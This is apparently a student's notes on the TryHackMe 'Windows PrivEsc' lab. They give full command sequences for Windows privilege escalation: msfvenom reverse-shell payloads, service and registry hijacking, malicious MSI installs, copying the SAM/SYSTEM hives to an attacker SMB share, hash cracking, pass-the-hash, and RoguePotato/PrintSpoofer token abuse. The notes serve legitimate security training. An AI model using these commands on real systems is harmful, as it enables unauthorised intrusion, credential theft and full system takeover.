# THM - Windows PrivEsc
:::danger
<details>
<summary>Generate a Reverse Shell Executable</summary>
## 1. first Create **`Reverse Shell file`** on my kali device
```ruby
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
```
- **`msfvenom`** : Tool from Metasploit used to generate payloads.
- **`-p windows/x64/shell_reverse_tcp`** : Reverse shell type
- **`LHOST`** : Device IP that will recive the shell in this case will be my kali machine
- **`LPORT`** : port that shell will connect to it on kali
- **`-f exe`** : output file type `exe`
- **`-o reverse.exe`** : put the output in file call ``reverse.exe``
## 2. send reverse sell to windows
**`on kali Device open smb servrice on directory that have reverseshell file`**
```ruby
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
```
- **`kali`** : name share
- **`.`** : files that will avilable in the share here in current Directory
**`on Windows Device`**
```ruby
copy \\10.8.47.102\kali\reverse.exe C:\PrivEsc\reverse.exe
```
- copy file from kali machine to windows
---
- **`that is mean file is copied to windows`**
---
### **`now run the reverse file on windows with lesten on port 4444 on kali`**
- **`here we go we receved the shell `**
</details>
:::
___
:::success
<details>
<summary>Service Exploits</summary>
- <details>
<summary>Insecure Service Permissions</summary>
> ### Goal is prevEsc form normal user to `SYSTEM privileges` by **`daclsvc`** service
## 1. first check the privilages of current user on this service ``(daclsvc)``
```ruby
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
```
- **`accesschk.exe`** : This is Tool form _Sysinternals_ to check on privilege of current user on (files, folders, etc...)
- **`/accepteula`** : this option to pybaass the first priv window
- **`-uwcqv`** : options
- **`u`** : user account
- **`w`** : writeing privileges
- **`c`** : change `config` privileges
- **`q`** : `quiet` to make it simple
- **`v`** : `verbose` for more details
- **`user`** : username of current user
- **`daclsvc`** : service name
---
### - **`Found that user have`** :
```ruby
SERVICE_CHANGE_CONFIG
```
### - ``Thats mean this user can change settings of this service``
---
## 2. now we want to know privileges of the current service
```ruby
sc qc daclsvc
```
- **`sc qc`** : query config for service
- **`daclsvc`** : name of the service
---
### - we found :
- **`SERVICE_START_NAME`** : the account that this service work with it
- **`LocalSystem`** : that is mean if we run this service any program will run as **`SYSTEM`**
---
> ### NOW WE know that :
> - this service can work as **`SYSTEM`**
> - current user can edit this service settings **`SERVICE_CHANGE_CONFIG`**
## 3. change the path of this service to path of our reverse shell that will send shell to kali with **`SYSTEM`** privileges :
```ruby
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
```
- **`sc config`** : change service settings
- **`binpath=`** : the new path to that service will run it
- **`\"C:\PrivEsc\reverse.exe\`** : reverse shell that we sent it before
### **`lesten on port 4444 on kali`**
### **`run the service`**
---
## receved the shell :
---
## see that we now **`SYSTEM`** user
```ruby
whoami
```
<details>
<summary>more commands</summary>
## to see our privilleges
```ruby
whoami /priv
```
## see the groups that i'm in :
```ruby
whoami /groups
```
```ruby
systeminfo
```
## to show all env variables:
```ruby
set
```
</details>
> ## now the answer of the question :
> What is the original BINARY_PATH_NAME of the daclsvc service?
```ruby
sc qc daclsvc
```
**`answer`**
```ruby
C:\Program Files\DACL Service\daclservice.exe
```
</details>
- <details>
<summary>Unquoted Service Path</summary>
> ## in windows each service has :
> - **`BINARY_PATH_NAME`** : THE path with refer to the place that have **`exe`** that this service will run it
> - if it's value writen without ``"..."`` that mean we can exploit it
---
## 1. first get info about the service (unquotedsvc)
```ruby
sc qc unquotedsvc
```
## - found two important things
> - **`SERVICE_START_NAME : LocalSystem`** : that is mean this service work as **`SYSTEM`**
> - **`BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`**
>> - IT without ``"..."``
---
## 2. TRY To know the privilege of current user on this path
```ruby
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
```
## - **`RW BUILTIN\Users`** : that is mean any normal user can do read and write in this folder
---
## 3. move the reverse shell file to the new path with new name
```ruby
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
```
## 4. open listener on kali
```ruby
sudo nc -nvlp 4444
```
## 5. run the service
```ruby
net start unquotedsvc
```
---
</details>
- <details>
<summary> Weak Registry Permissions</summary>
> ## in windows each service has settings stored in `Registry` like:
> - **`SERVICE_START_NAME`** : who run the service
> - **`BINARY_PATH_NAME`** : the excutable file that run when this service run
## 1. first get info about the service (regsvc):
```ruby
sc qc regsvc
```
```c
BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
SERVICE_START_NAME : LocalSystem
```
## 2. check the privilege of this user to wirte on **`Registry`**
```ruby
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
```
```perl
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS
```
### - `that is mean any user have access to write on registry key of this service`
## 3. edit Registry value and make it refer to our reverseshell file
```ruby
reg add HKLM\SYSTEM\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
```
- **`/v ImagePath`** : It determines that we change this particular value.
- **`/t REG_EXPAND_SZ`** : Value type (String extended).
- **`/d C:\PrivEsc\reverse.exe`** : New data (new path).
- **`/f`** : (to not ask you for confirmation).
## 4. open Listener on kali
```ruby
nc -nvlp 4444
```
## 5. run the service
```ruby
net start regsvc
```
</details>
- <details>
<summary>Insecure Service Executables</summary>
## 1. Query the service configuration
```ruby
sc qc filepermsvc
```
- **`sc`** : `(Service Control)` Tool in windows
- **`qc`** : `(Query Configuration)` to get service settings
---
```ruby
BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\filepermservice.exe"
SERVICE_START_NAME : LocalSystem
```
---
## 2. Check file permissions with accesschk
```ruby
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
```
- **`accesschk.exe`** : Tool from _Sysinternals_
- **`/accepteula`** : It means "I agree to the user agreement" (required the first time).
- **`-quvw`**
- **`q`** : quiet
- **`u`** : show user-specific permissions
- **`v`** : `verbose` More detail
- **`w`** : It focuses on write permissions (who has the authority to write to the file).
- **`"C:\Program Files\File Permissions Service\filepermservice.exe"`** : The file whose permissions we want to see.
---
```ruby
RW Everyone
FILE_ALL_ACCESS
```
### - `π¨ that is mean every one on this system They have almost all the permissions on the file (read, write, modify, delete...).`
## 3. Replace the service binary
```ruby
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
```
- **`copy`** : File copy command.
- **`C:\PrivEsc\reverse.exe`** : The reverse shell we created (our malicious file).
- **`"C:\Program Files\File Permissions Service\filepermservice.exe"`** : The original file of the service.
- **`/Y`** : He lets the copying happen without asking you, βAre you sure you want to overwrite?β
## 4. Start listener on Kali
```ruby
nc -lvnp 4444
```
## 5. Start the service
```ruby
net start filepermsvc
```
- **`net`** : A Windows tool for managing networks and services.
- **`start`** : Service run command.
- **`filepermsvc`** : service name
</details>
</details>
<details>
<summary>Registry</summary>
- <details>
<summary>AutoRuns</summary>
## 1. Query the registry for AutoRun executables
```ruby
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
- **`reg`** : A tool for managing the registry in Windows (query, add, delete...).
- **`query`** : It means "View the contents of the key" (read only).
- **`HKLM`** : HKEY_LOCAL_MACHINE shortcut (part of the registry that stores system settings for all users).
- **`SOFTWARE\Microsoft\Windows\CurrentVersion\Run`** : The key that stores programs that start automatically when the system starts (Autoruns).
```ruby
"C:\Program Files\Autorun Program\program.exe"
```
> ---
> ### π _The goal is to see which programs start automatically with every restart or login._
> ---
## 2. Check file permissions with AccessChk
```ruby
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
```
- **`accesschk.exe`** : Tool from _Sysinternals_
- **`/accepteula`** : It means "I agree to the user agreement" (required the first time).
- **`-uvw`**
- **`u`** : show user-specific permissions
- **`v`** : `verbose` More detail
- **`w`** : It focuses on write permissions (who has the authority to write to the file).
- **`"C:\Program Files\Autorun Program\program.exe"`** : The executable file of the program that runs automatically.
```ruby
RW Everyone
FILE_ALL_ACCESS
```
> ---
> ### π _The goal β Check if this file is writable by any user (Everyone or BUILTIN\Users). If ah β this is a big weakness._
> ---
## 3. Overwrite the AutoRun executable
```ruby
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
```
> ---
> ### π _Goal β Replace the program that runs automatically (program.exe) with our reverse shell._
> ---
## 4. Start a listener on Kali
```ruby
nc -lvnp 4444
```
## 5. Open a new RDP session to trigger
```ruby
rdesktop 10.10.110.227
```
> login with
```css
admin : password123
```
---
> ---
> ### π _Shell will return with the privileges of the user who loged in_
> ---
</details>
- <details>
<summary>AlwaysInstallElevated</summary>
## 1. Query the registry for AlwaysInstallElevated keys
```ruby
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
- **`reg`** : A tool for managing the registry in Windows (query, add, delete...).
- **`query`** : It means "View the contents of the key" (read only).
- **`HKLM`** : HKEY_LOCAL_MACHINE shortcut (part of the registry that stores system settings for all users).
- **`HKCU`** : HKEY_CURRENT_USER shortcut (settings specific to the current user).
- **`\SOFTWARE\Policies\Microsoft\Windows\Installer`** : Path to Windows Installer settings.
- **`/v AlwaysInstallElevated`** : It means "Show me the value of the entry called `AlwaysInstallElevated`".
> ---
> ### π _Goal β Make sure that the two keys are present and set to 1 `(0x1)` β if yes That is mean any ``MSI package`` can be installed with `SYSTEM privileges`._
> ---
## 2. Generate malicious MSI with msfvenom (on Kali)
```ruby
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.47.102 LPORT=4444 -f msi -o reverse.msi
```
- **`msfvenom`** : Tool from Metasploit used to generate payloads.
- **`-p windows/x64/shell_reverse_tcp`** : Reverse shell type
- **`LHOST`** : Device IP that will recive the shell in this case will be my kali machine
- **`LPORT`** : port that shell will connect to it on kali
- **`-f msi`** : output file type `msi`
- **`-o reverse.msi`** : put the output in file call ``reverse.msi``
> ---
> ### π _Goal β Create a malicious MSI file that opens Reverse Shell._
> ---
## 3. Transfer the MSI to Windows
**`on kali`**
```ruby
impacket-smbserver frank . -smb2support
```
**`on windows`**
```ruby
copy \\10.10.10.10\frank\reverse.msi C:\PrivEsc\
```
## 4. Start a listener on Kali
```ruby
nc -lvnp 4444
```
## 5. Run the malicious MSI on Windows
```ruby
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
```
- **`msiexec`** : Windows Installer (responsible for installing .msi).
- **`/quiet`** : install program without any GUI or popups.
- **`/qn`** : Same idea (Quiet with No UI).
- **`/i`** : install package
- **`C:\PrivEsc\reverse.msi`** : The file we want to install.
> ---
> ### π _Goal β Since `AlwaysInstallElevated=1` in `HKLM and HKCU` β any MSI installed will be installed as SYSTEM.Therefore, our reverse shell runs directly with SYSTEM privileges._
> ---
</details>
</details>
<details>
<summary>Passwords</summary>
- <details>
<summary>Registry</summary>
>[!note]
> **`(For some reason sometimes the password does not get stored in the registry. If this is the case, use the following as the answer: password123)`**
## 1. Search for the word "password" in the registry
```ruby
reg query HKLM /f password /t REG_SZ /s
```
- **`reg`** : A tool for managing the registry in Windows (query, add, delete...).
- **`query`** : It means "View the contents of the key" (read only).
- **`HKLM`** : HKEY_LOCAL_MACHINE shortcut (part of the registry that stores system settings for all users).
- **`/f password`** : /f means βfilterβ β Here we look for the text βpasswordβ.
- **`/t REG_SZ`** : This means looking for values ββof type string.
- **`/s`** : `search recursively` (Searches all subkeys)
> ---
> ### π _Goal β To see if anywhere in the registry there is a password stored in plain text._
> ---
## 2. Search directly for AutoLogon key
```ruby
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
- It goes directly to Winlogon key.
- In some systems, this contains values ββlike:
- **`DefaultUserName`**
- **`DefaultPassword`**
- **`AutoAdminLogon`**
> ---
> ### π _Goal β To access the stored admin username and password so that the system performs an automatic login._
> ---
## 3. Executing a command on the system using Winexe
```ruby
winexe -U 'admin%password' //10.10.194.107 cmd.exe
```
- **`winexe`** : A tool that allows you to run commands on a Windows machine from a remote Linux machine (similar to PsExec).
- **`-U 'admin%password'`** :
- **`-U`** : user
- **`'admin%password'`** : Here we specify the username and password in the form `username%password`.
- **`Example`** : `'admin%password123'`.
- **`cmd.exe`** : The program we want to run on the target device (here is the command prompt).
> ---
> ### π _Goal β Command Prompt will open for you with Administrator privileges on the target device while you are running Kali._
> ---
</details>
- <details>
<summary>Saved Creds</summary>
## 1. View stored Credentials
```ruby
cmdkey /list
```
- **`cmdkey`** : A built-in Windows tool for managing Stored Credentials.
- **`/list`** : display all credentials Saved in the system.
> ---
> ### π _Goal β To see if there is a user (such as admin) stored with its password in the Windows Vault._
> ---
<details>
<summary>Note</summary>
>[!Note]
> #### _**`Note that credentials for the "admin" user are saved. If they aren't, run the`**_
> ```ruby
> C:\PrivEsc\savecred.bat script
> ```
> to refresh the saved credentials.
> ## ``savecred.bat`` β A script on the lap that forces the system to store the credential (usually owned by the admin).
> Objective: Make sure that the credential is registered so that we can exploit it.
</details>
## 2. run payload using saved credential
```ruby
runas /savecred /user:admin C:\PrivEsc\reverse.exe
```
- **`runas`** : Tool to run programs as different user
- **`/savecred`** : It means use the credential stored in the system instead of asking you to enter the password.
- **`/user:admin`** : Specify that you want to run the program as a user named admin.
- **`C:\PrivEsc\reverse.exe`** : This is your payload (reverse shell).
> ---
> ### π _Goal β Run reverse.exe with admin privileges without entering the password yourself β take a shell with higher privileges._
> ---
## 3. open listener on kali
```ruby
nc -nvlp 4444
```
</details>
- <details>
<summary>Security Account Manager (SAM)</summary>
> ``The idea of ββexploitation``
> Windows stores user password hashes in a file called ``SAM`` (Security Account Manager).
> But the SAM is encrypted, and the key to decrypt it is stored in the ``SYSTEM`` file.
> ---
> ### π _The idea β If you find a backup copy of these files (such as ``C:\Windows\Repair\``), you can copy them and break the passwords._
> ---
## 1. Transfer SAM and SYSTEM files to Kali
```ruby
copy C:\Windows\Repair\SAM \\10.8.47.102\kali\
copy C:\Windows\Repair\SYSTEM \\10.8.47.102\kali\
```
> ---
> ### π _Goal β We take the hashes files and bring them to us so that we can work on them at our convenience._
> ---
## 2. Download ``creddump7`` Tool
```ruby
git clone https://github.com/Tib3rius/creddump7
```
> Install the encryption library
```python
pip3 install pycrypto
```
- **`pip3`** : Python3 package manager.
- **`install pycrypto`** : We install the `PyCrypto library`so that the tool can extract hashes form files.
## 3. Extracting hashes from files
```ruby
python3 creddump7/pwdump.py SYSTEM SAM
```
## 4. Crack the hash using Hashcat
```ruby
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
```
- **`hashcat`** : A powerful tool for cracking passwords.
- **`-m 1000`** : It means the hash is of type NTLM.
## 5. Exploiting the password after it is broken
```ruby
winexe -U 'admin%<password>' //10.10.10.10 cmd.exe
Or
rdesktop -u admin -p <password> 10.10.10.10
```
</details>
- <details>
<summary> Passing the Hash</summary>
> ---
> ### π _The idea β Usually in attacks on Windows, when you have a hash instead of cracking the password, you can use a technique called Pass-the-Hash (PTH).
> Idea: The hash is used directly for authentication instead of the actual password.
> Why is this useful?
> - Save time (you don't need to break the password).
> - Some systems may prevent brute-force, but not the use of hash for authentication._
> ---
```ruby
pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.148.63 cmd.exe
```
or
```ruby
python3 /usr/share/doc/python3-impacket/examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da admin@10.10.148.63
```
> `smbexec.py` uses the creation service on Windows to run the shell.
> Any service that runs on Windows usually runs under `SYSTEM` privileges.
> This means that even if the user you specified is admin, the `shell` that will open will be `SYSTEM` because it is the service on Windows that is running.
> This is a great advantage because it gives you the highest powers over the system.
| tool | Privileges | method |
| --------------------- | ------------------ | -------------------------------------------------- |
| `impacket smbexec.py` | SYSTEM | You create a service and run a shell inside it |
| `pth-winexe` | Admin | Regular logon and shell execution in user session |
</details>
</details>
<details>
<summary>Scheduled Tasks</summary>
- <details>
<summary>Tip</summary>
> ### This senireo from THM room and we know that the Scheduled task is **`C:\DevTools\CleanUp.ps1`**
> but in real world how to know ??
> - ### **`To view all Scheduled Tasks in system`**
## **`CMD`**
```ruby
schtasks /query /fo LIST /v
```
## **`powershell`**
```ruby
Get-ScheduledTask | Format-List *
```
## **`GUI`**
```ruby
taskschd.msc
```
-----
> - ### **`To view all Scheduled Tasks that work as SYSTEM`**
## **`powershell`**
```ruby
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM"} | Format-List *
```
---
> ## Where tasks files are stored in?
```ruby
C:\Windows\System32\Tasks
```
</details>
## 1. View the content of the PowerShell script
```ruby
type C:\DevTools\CleanUp.ps1
```
- **`type`** : A Windows command that displays the contents of any text file.
- **`C:\DevTools\CleanUp.ps1`** : This is a PowerShell Script file.
> Purpose: To understand what the script is doing (it may be deleting logs or cleaning folders).
> ---
> ### π _NOte β "The script seems to be running as SYSTEM every minute"_
> ---
## 2. Check file permissions
```ruby
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
```
> ---
> ### π _Goal β Make sure that we can write (Write/Modify) to this script._
> ---
## 3. Adding a malicious line to the script
```ruby
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
```
> ---
> ### π _Goal β o make the script run every time your program, reverse.exe, runs with it._
> ---
## 4. Open Listener on kali
```ruby
nc -nvlp 4444
```
</details>
<details>
<summary>Insecure GUI Apps</summary>
> ---
> ### After you enter RDP, you will find a shortcut named βAdminPaintβ on your desktop.
> When you step on it, it launches the Paint program (mspaint.exe), but it is not normal β it starts using Administrator's Privileges.
> This means that you have a GUI (Paint) program running with higher privileges than you.
>
> ---
## 1. Check privileges βAdminPaintβ work with it
```ruby
tasklist /V | findstr mspaint.exe
```
- **`tasklist /v`** : It displays all running processes in detail (PID, program name, which user runs it).
- **`| findstr mspaint.exe`** : Filter the results to only answer the Paint line.
## 2. Exploiting the Open Dialog
- Open Paint β from the menu press File β Open.
- You will receive a Dialog Box for opening files.
- Now, instead of writing an image name, you will write in the navigation bar:
```ruby
file://c:/windows/system32/cmd.exe
```
- click ``enter`` not **`open`** button
</details>
<details>
<summary>Startup Apps</summary>
## 1. Check Startup directory permissions
```ruby
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
```
- **`-d`** : It means βDirectory permissionsβ shows you who can read/write/delete in the folder.
> ---
> ### π _Goal β If you find that the Users group has Write permission here, then any normal user can upload a file/Shortcut that will be executed automatically with any user (even the admin) running β Privilege Escalation._
> ---
## 2. Run vbs Script
```ruby
cscript C:\PrivEsc\CreateShortcut.vbs
```
- **`cscript`** : This is the command-line host for running VBScript (.vbs) files.
- **`C:\PrivEsc\CreateShortcut.vbs`** : the script that we want to run it
> this file when it run it make shortcut to **`C:\PrivEsc\reverse.exe`** and put it on **`startup`** directory
> ---
> ### π _Goal β Instead of writing a shortcut manually, the script creates it automatically and places it in the correct place._
> ---
## 3. simulate an admin logon using RDP
```ruby
rdesktop -u admin 10.10.122.63
```
> here you login as admin just to simulate the attack, in real world the user who login shortcut will work you will take shell with it's privileges
## 4. open Listener on kali
```ruby
nc -lnvp 4444
```
</details>
<details>
<summary>Token Impersonation</summary>
- <details>
<summary>Rogue Potato</summary>
> ## - In Windows, every process runs under a Security Token that determines its privileges.
> - Some services have high permissions, such as LOCAL SERVICE or SYSTEM.
> ## - If you can "borrow" or "obtain" a token from a service that has high privileges, you can run your program with the same privileges.
> ## - When you send ``reverse.exe`` to Windows, it is a simple program that attempts to make a reverse connection to the Kali machine.
> - If you run it as Admin, it will work with your current permissions. If you run it as a Local Service, it will run with less privileges.
>> ** `The goal: to gain an βentry pointβ into the system, regardless of the initial permissions.`**
> ## **`PSExec`** is a tool from Sysinternals that allows you to run any program on any Windows machine, and even set the privileges of a specific user or service.
> ## **`RoguePotato`** It is an Executable/Script that exploits a vulnerability in the Windows system.
>> #### - **`Its function: Run any program on the device with SYSTEM privileges by exploiting Windows COM / Service Tokens.`**
>> - In Windows, every service has a token that defines its permissions.
>> - Some services have SYSTEM privileges.
>> - RoguePotato exploits a weakness in permissions or COM objects that allows a normal process (such as a Local Service) to "borrow" the SYSTEM privileges service's Token.
>> - After that, any program you run with this Token (such as reverse.exe) will run with SYSTEM privileges.
## 1. Run socat redirector on Kali
```ruby
sudo socat tcp-listen:135,reuseaddr,fork tcp:MACHINE_IP:9999
```
- **`socat`** : A program that allows us to create a redirect or proxy for communication between two sockets (TCP/UDP).
- **`tcp-listen:135`** : Listen on port 135 in Kali.
- `135` : is the RPC Endpoint Mapper port that Windows uses.
- **`reuseaddr`** : It allows port reuse even if sessions are open.
- **`fork`** : A fork is used for each new connection (meaning it can serve more than one connection).
<details>
<summary>why not netcat??</summary>
### When we use nc directly
```ruby
nc -lnvp 9999
```
- This is a normal listener on Kali that waits for any connection from Windows on port 9999.
- Problem: In some scenarios, the exploit or reverse shell on Windows will not be able to connect directly to the listener, especially if:
- The port that the original program is trying to open is not available (for example 135).
- There is firewall or NAT blocking.
---
### when we use socat redirector
```ruby
sudo socat tcp-listen:135,reuseaddr,fork tcp:MACHINE_IP:9999
```
- This does Port Forwarding / Redirector:
- Any connection coming to Kali on port 135 will automatically switch to the listener on port 9999.
- Advantages:
- We can emulate or redirect any port required by exploit.
- It is useful if the payload on Windows is designed to connect to a specific port (here 135).
- fork allows socat to accept more than one connection at the same time.
---
### Practical difference
| Property | nc -lnvp 9999 | socat tcp-listen:135 β 9999 |
| ------------------------------------------------- | --------------- | ------------------------------ |
| Type of use | Listener normal | Port forwarding + listener |
| Number of connections | One for each order | multi(`fork`) |
| Adjustable port payload | less |Any port you want can be redirected |
| Suitable for exploits that expect a specific port | less | excellent |
</details>
> ---
> ### π _Goal β Any incoming connection on Kali from port 135 will automatically be routed to the listener on port 9999 to facilitate reception of the reverse shell from Windows._
> ---
## 2. Run PSExec64.exe
```ruby
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
```
- **`C:\PrivEsc\PSExec64.exe`** : A tool from Sysinternals that we use to run commands as another user.
- **`-i`** : `interactive session` (links to the current desktop session).
- **`-u "nt authority\local service"`** : We operate as a Local Service account.
- **`C:\PrivEsc\reverse.exe`** : reverse shell file
> ---
> ### π _Goal β take a new shell, but as a Local Service (not Administrator)._
> ---
## 3. run RoguePotato
```ruby
C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999
```
- **`RoguePotato`** : It is an Executable/Script that exploits a vulnerability in the Windows system.
- **`-r 10.10.10.10`** : kali Ip that socat run on it
- **`-e "C:\PrivEsc\reverse.exe"`** : file we want to run it as `SYSTEM`
- **`-l 9999`** : port that RoguePotato will use it to internal redirect
> ---
> ### π _Goal β RoguePotato exploits DCOM/RPC to request a token from the SYSTEM account and then uses it to run your program as SYSTEM._
> ---
> # **`Name one user privilege that allows this exploit to work.`**
```perl
SeImpersonatePrivilege
```
- **`This is the permission that allows the process to βborrowβ the permissions of any token present on the system, and this is the basis that RoguePotato exploits.`**
> # **`Name the other user privilege that allows this exploit to work.`**
```perl
SeAssignPrimaryTokenPrivilege
```
- **`This is the permission that allows a new token to be assigned to any process, and completes the process that RoguePotato uses to access the system.`**
</details>
- <details>
<summary>PrintSpoofer</summary>
> There are 3 important levels of permissions in Windows:
| **Account** | **Level** | **Description** |
| ----------------------- | ----------------- | -------------------------------------- |
| **Local Service** | Low privilege | Weak system service, very limited permissions
| **Administrator** | High privilege | It can do almost everything, but not SYSTEM |
| **NT AUTHORITY\SYSTEM** | Highest privilege | The most powerful account on Windows |
> Here we will start from the Local Service account and go to SYSTEM.
## 1. Step 1 β Start a listener on Kali
```ruby
nc -lvnp 4444
```
## 2. login as admin and open `cmd` as adminstrator and run this command:
```ruby
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
```
- ``PSExec64.exe`` : tool to run a program with "Local Service" account privileges.
- **`-i`** : interactive mode
- **`-u "nt authority\local service"`** : Run the program as Local Service user.
> ---
> ### π _Goal β On the Kali terminal, you will receive the first reverse shell with Local Service privileges._
> ---
## 3. Start a listener on Kali
```ruby
nc -lvnp 4444
```
## 4. Step 3 β Exploit PrintSpoofer
```ruby
C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
```
- **`PrintSpoofer.exe`** : PrintSpoofer is an Exploit that exploits SeImpersonatePrivilege.
- The Local Service usually has this privilege.
- Result: We can circumvent Windows and upgrade to NT AUTHORITY\SYSTEM privileges.
- **`-c "C:\PrivEsc\reverse.exe"`** : The command you want to run is as SYSTEM, and here we run reverse.exe.
## 5. recive the shell with **`authority\system`**
</details>
</details>
<details>
<summary>Privilege Escalation Scripts</summary>
:::warning
> Several tools have been written which help find potential privilege escalations on Windows. Four of these tools have been included on the Windows VM in the C:\PrivEsc directory:
```
winPEASany.exe
Seatbelt.exe
PowerUp.ps1
SharpUp.exe
```
:::
</details>
---
:::info
> ### ``Connect to Target`` :
> #### `if RDP srvice enabled`
> ```ruby
> xfreerdp3 /u:user /p:password321 /cert:ignore /v:10.10.103.25
> ```
> Or
> ```ruby
> rdesktop 10.10.103.25 -u user -p password321
> ```
> #### `if winrm service is enabled` :
> ```ruby
> evil-winrm -i 10.10.103.25 -u user -p 'password321'
> ```
> #### `if SMB service is enabled` :
> ```ruby
> smbclient //MACHINE_IP/C$ -U user
> ```
:::
:::warning
- <details>
<summary>Nmap Scan</summary>
```ruby
nmap -sC -sV 10.10.103.25
```
**`output`**
```ruby
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard Evaluation 17763 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-08T19:27:18+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=WIN-QBA94KB3IOF
| Not valid before: 2025-09-07T18:56:41
|_Not valid after: 2026-03-09T18:56:41
| rdp-ntlm-info:
| Target_Name: WIN-QBA94KB3IOF
| NetBIOS_Domain_Name: WIN-QBA94KB3IOF
| NetBIOS_Computer_Name: WIN-QBA94KB3IOF
| DNS_Domain_Name: WIN-QBA94KB3IOF
| DNS_Computer_Name: WIN-QBA94KB3IOF
| Product_Version: 10.0.17763
|_ System_Time: 2025-09-08T19:27:08+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h23m59s, deviation: 3h07m51s, median: -1s
| smb-os-discovery:
| OS: Windows Server 2019 Standard Evaluation 17763 (Windows Server 2019 Standard Evaluation 6.3)
| Computer name: WIN-QBA94KB3IOF
| NetBIOS computer name: WIN-QBA94KB3IOF\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-09-08T12:27:11-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-09-08T19:27:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.26 seconds
```
- **`3389/tcp open ms-wbt-server`** : That is mean `RDP service` is work
- **`5985/tcp open http`** : That is mean `WinRM HTTP service` is work
- **`445/tcp open microsoft-ds`** : That is mean `SMB service` is work
</details>
:::
Sign in with Wallet
Connect another wallet